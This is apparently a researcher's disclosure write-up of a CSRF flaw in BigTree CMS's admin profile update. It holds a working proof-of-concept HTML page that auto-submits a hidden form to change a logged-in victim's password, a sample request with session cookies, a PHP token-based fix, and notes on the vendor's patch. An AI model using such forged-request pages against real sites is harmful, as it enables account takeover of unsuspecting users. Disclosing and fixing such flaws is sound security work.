This is a little explanation of the vulnerability and how to exploit it.
The vulnerability is in the account settings request, which is used to change the account name, company and password.
A normal request looks like this:
POST /site/index.php/admin/users/profile/update/ HTTP/1.1
Host: bigtree
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bigtree/site/index.php/admin/users/profile/
Cookie: bigtree_admin[email]=admin%40admin.com; bigtree_admin[password]=%24P%24BtBKYRYkkk%2FMEvT%2F.XzNJO8j.6Z1bN%2F; PHPSESSID=iee0n5s0gu9b0ausud7hdqkql4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

name=Developer&password=newpassword&company=
The vulnerability exists in the update handler:

<?
// Applies whatever arrives in $_POST straight to the profile
$admin->updateProfile($_POST);
$admin->growl("Users","Updated Profile");
BigTree::redirect(ADMIN_ROOT."dashboard/");
?>

It clearly isn't doing any checks to prevent CSRF: there is no token, and no check that the request came from the application's own form.
So exploiting this is very simple: you just have to lure someone who is already logged into the application into visiting a page containing this code:

<html>
<body>
<form method="post" action="http://bigtree/site/index.php/admin/users/profile/update/">
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="password" value="newpassword" />
<input type="hidden" name="company" value="foobar" />
</form>
<script>
// document.forms is a collection, so submit the first (only) form
document.forms[0].submit()
</script>
</body>
</html>
The values here can be changed to anything; the page just automatically issues a POST request to http://bigtree/site/index.php/admin/users/profile/update/ carrying the name, password and company values from the hidden fields, and the browser attaches the victim's cookies to it.
Unfortunately it is reasonably intrusive, because once the request goes through the victim is redirected to the dashboard and shown the "Updated Profile" notification.
So the user will immediately know that their profile details might have changed.
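For comparison, here is how a handler like this can be protected with a synchronizer token. This is an added example and not BigTree's own fix; the function names, the session key and the csrf_token field are assumptions. The forged page above cannot supply a valid token because the attacker's origin cannot read the victim's session.

```php
<?php
// Added example (not BigTree's code): per-session CSRF token for the profile update.
// Assumed names: csrf_token(), csrf_valid(), $_SESSION['csrf_token'], POST field csrf_token.
session_start();

// Issue one unguessable token per session and reuse it in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_valid(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Refuse the update unless the request carries the session's token.
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $admin->updateProfile($_POST);
    $admin->growl("Users", "Updated Profile");
    BigTree::redirect(ADMIN_ROOT."dashboard/");
}
?>
<!-- The legitimate profile form embeds the token; a cross-site page cannot read it. -->
<form method="post" action="/site/index.php/admin/users/profile/update/">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>" />
  <input type="text" name="name" />
  <input type="password" name="password" />
  <input type="text" name="company" />
  <input type="submit" value="Update" />
</form>
```

Checking that the Origin or Referer header matches the site adds a second, independent layer, but the token check alone is what turns the forged request above into a 403.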
So I contacted Tim Buckingham (the lead developer for BigTree CMS) about this issue yesterday (on 7th March 2015) and he replied the next day informing me that he'd fixed the issue.
You can see the fix here.
The next full releases of BigTree CMS (4.1.6 and 4.0.10) should be out next week and will incorporate this fix.
Happy Hacking :-)
Update (07/04/2015): BigTree CMS have finally released the next version (4.2) that includes the fix, you can download the latest version from here.